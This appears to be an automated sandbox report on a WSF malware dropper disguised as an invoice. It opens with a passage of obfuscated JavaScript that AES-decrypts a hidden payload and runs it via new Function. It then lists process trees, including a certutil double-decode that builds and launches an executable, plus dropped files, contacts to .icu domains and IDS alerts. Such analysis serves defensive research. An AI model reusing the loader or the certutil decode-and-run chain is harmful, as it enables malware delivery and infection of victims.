t||(t=o.CqlccWGqHP(8)),r=n.xrkoWLGoQF({KzfiCbrnue:a+v}).IOaZMzuUuc(r,t),v=o.xrkoWLGoQF(r.eZRNeHSVmZ.slice(a),4*v),r.KlwuiHJXBf=4*a,e.xrkoWLGoQF({key:r,yLIlTYUEdC:v,salt:t})}},l=r.vaJXBqfphC=c.LBLCJIeRxa({tAjRFOtDJa:c.tAjRFOtDJa.LBLCJIeRxa({kdf:f}),PYbsXnmtJA:function(r,a,v,t){return v=(t=this.tAjRFOtDJa.LBLCJIeRxa(t)).kdf.mxqauHfFCq(v,r.KzfiCbrnue,r.XRkvWggaQX),t.yLIlTYUEdC=v.yLIlTYUEdC,(r=c.PYbsXnmtJA.call(this,r,a,v.key,t)).GYRmHplwNA(v),r},IXjSHElPSb:function(r,a,v,t){return t=this.tAjRFOtDJa.LBLCJIeRxa(t),a=this._eMUXrzTNkg(a,t.XCoXBEMuLA),v=t.kdf.mxqauHfFCq(v,r.KzfiCbrnue,r.XRkvWggaQX,a.gwiUkDQFxZ),t.yLIlTYUEdC=v.yLIlTYUEdC,c.IXjSHElPSb.call(this,r,a,v.key,t)}})}(),function(){for(var r=NKBCmUHGeG,a=r.eazSwMHLnL.BlockSQaxnzYskL,v=r.RfuCsvEMIV,o=[],t=[],n=[],i=[],s=[],u=[],h=[],e=[],c=[],f=[],l=[],p=0;p<256;p++)l[p]=p<128?p<<1:p<<1^283;var g=0,d=0;for(p=0;p<256;p++){var k=(k=d^d<<1^d<<2^d<<3^d<<4)>>>8^255&k^99;o[g]=k;var y=l[t[k]=g],w=l[y],S=l[w],_=257*l[k]^16843008*k;n[g]=_<<24|_>>>8,i[g]=_<<16|_>>>16,s[g]=_<<8|_>>>24,u[g]=_,_=16843009*S^65537*w^257*y^16843008*g,h[k]=_<<24|_>>>8,e[k]=_<<16|_>>>16,c[k]=_<<8|_>>>24,f[k]=_,g?(g=y^l[l[l[S^y]]],d^=l[l[d]]):g=d=1}var B=[0,1,2,4,8,16,32,64,128,27,54];v=v.vWLWtnhNPM=a.LBLCJIeRxa({VDrUSIMlYF:function(){for(var r=(v=this.ujgXpnylwb).eZRNeHSVmZ,a=v.KlwuiHJXBf/4,v=4*((this._nRounds=a+6)+1),t=this.ujgXpnylwbSchedule=[],n=0;n<v;n++)if(n<a)t[n]=r[n];else{var i=t[n-1];n%a?6<a&&4==n%a&&(i=o[i>>>24]<<24|o[i>>>16&255]<<16|o[i>>>8&255]<<8|o[255&i]):(i=o[(i=i<<8|i>>>24)>>>24]<<24|o[i>>>16&255]<<16|o[i>>>8&255]<<8|o[255&i],i^=B[n/a|0]<<24),t[n]=t[n-a]^i}for(r=this.hpsQNEkfti=[],a=0;a<v;a++)n=v-a,i=a%4?t[n]:t[n-4],r[a]=a<4||n<=4?i:h[o[i>>>24]]^e[o[i>>>16&255]]^c[o[i>>>8&255]]^f[o[255&i]]},PYbsXnmtJABlock:function(r,a){this.hXOUXbKyiS(r,a,this.ujgXpnylwbSchedule,n,i,s,u,o)},IXjSHElPSbBlock:function(r,a){var v=r[a+1];r[a+1]=r[a+3],r[a+3]=v,this.hXOUXbKyiS(r,a,this.hpsQNEkfti,h,e,c,f,t),v=r[a+1],r[a+1]=r[a+3],r[a+3]=v},hXOUXbKyiS:function(r,a,v,t,n,i,o,s){for(var u=this._nRounds,h=r[a]^v[0],e=r[a+1]^v[1],c=r[a+2]^v[2],f=r[a+3]^v[3],l=4,p=1;p<u;p++){var g=t[h>>>24]^n[e>>>16&255]^i[c>>>8&255]^o[255&f]^v[l++],d=t[e>>>24]^n[c>>>16&255]^i[f>>>8&255]^o[255&h]^v[l++],k=t[c>>>24]^n[f>>>16&255]^i[h>>>8&255]^o[255&e]^v[l++];f=t[f>>>24]^n[h>>>16&255]^i[e>>>8&255]^o[255&c]^v[l++],h=g,e=d,c=k}g=(s[h>>>24]<<24|s[e>>>16&255]<<16|s[c>>>8&255]<<8|s[255&f])^v[l++],d=(s[e>>>24]<<24|s[c>>>16&255]<<16|s[f>>>8&255]<<8|s[255&h])^v[l++],k=(s[c>>>24]<<24|s[f>>>16&255]<<16|s[h>>>8&255]<<8|s[255&e])^v[l++],f=(s[f>>>24]<<24|s[h>>>16&255]<<16|s[e>>>8&255]<<8|s[255&c])^v[l++],r[a]=g,r[a+1]=d,r[a+2]=k,r[a+3]=f},KzfiCbrnue:8});r.vWLWtnhNPM=a.bvTMfLRMFS(v)}(),new Function(NKBCmUHGeG.vWLWtnhNPM.IXjSHElPSb("","\x34\x34\x32\x61\x35\x62\x66\x30\x61\x64\x36\x30\x34\x66\x34\x38\x35\x66\x63\x61\x32\x36\x66\x38\x37\x33\x35\x63\x32\x33\x36\x64\x35\x34\x33\x63\x66\x65\x33\x65\x34\x64\x61\x35\x61\x34\x34\x66\x38\x34\x62\x35\x65\x39\x34\x39\x34\x31\x65\x64\x38\x38\x61\x36",{XCoXBEMuLA:dtEDoFVfAj}).toString(NKBCmUHGeG.VmLLEtCkRa.IBEHHawlRa))(); |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
716 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Copy of Docs 68_204 INVO.WSF" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2632 | "C:\Windows\System32\cmd.exe" /c ping 1.1 -n 21 & cscript "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf" Function RegRead | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3996 | ping 1.1 -n 21 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2488 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2188 | cscript "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf" Function RegRead | C:\Windows\system32\cscript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3792 | "C:\Windows\System32\cscript.exe" "C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.drv?.wsf" Function RegRead | C:\Windows\System32\cscript.exe | cscript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Version: 5.8.7600.16385 | ||||
2240 | "C:\Windows\System32\cmd.exe" /c ping 1.1.1.1 -n 120 & cd "C:\Users\admin\AppData\Roaming" && certutil -decode "evFzI6iZOm" "evFzI6iZOm2" && certutil -decode "evFzI6iZOm2" "evFzI6iZOm.exe" && explorer "evFzI6iZOm.exe" | C:\Windows\System32\cmd.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2208 | ping 1.1.1.1 -n 120 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3792 | cscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\word[1].txt | — | |
MD5:— | SHA256:— | |||
3792 | cscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\0aaf0c56ae5396551dfa0589d5fda7abc37beea7e7d8d39b6901ffab66a493c09ecd4d69[1].txt | text | |
MD5:2BB4834348AD8C7CA5DE33C569E175D4 | SHA256:0AF1E9886832E35C63AD022EF7D89EF38313173A17AA0B66C2859BDD7F984F0C | |||
2188 | cscript.exe | C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.drv | xml | |
MD5:E8081971D97915187371190C7D5CEBD4 | SHA256:1516E4E82B9A2F5EB0E506847F6E09069C65DD8DD13782F92C84BEF56CD91A5E | |||
716 | WScript.exe | C:\Users\admin\AppData\Roaming\DzUcTBouPadONRSZkcmx.wsf | xml | |
MD5:E8081971D97915187371190C7D5CEBD4 | SHA256:1516E4E82B9A2F5EB0E506847F6E09069C65DD8DD13782F92C84BEF56CD91A5E | |||
3792 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@rapidssl[1].txt | text | |
MD5:E5EECD8705F7E6228730DE0FD941769C | SHA256:FB70B30C85F3D9588F145623C701D60448CC7557D19E2BCBC761A87D0B250BC2 | |||
3792 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@cloudown[1].txt | text | |
MD5:22AD25903920B63E49B74B9DB0E703F8 | SHA256:CB3DB222BD0065F38897B77B2472838E592415AC88AFAF1F0A46353698DA7937 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3792 | cscript.exe | 104.28.28.55:443 | certificate.rapidssl.icu | Cloudflare Inc | US | unknown |
3792 | cscript.exe | 104.28.0.94:443 | docs.cloudown.icu | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
docs.cloudown.icu |
| suspicious |
certificate.rapidssl.icu |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .icu Domain |
3792 | cscript.exe | Potentially Bad Traffic | ET INFO Suspicious Domain (*.icu) in TLS SNI |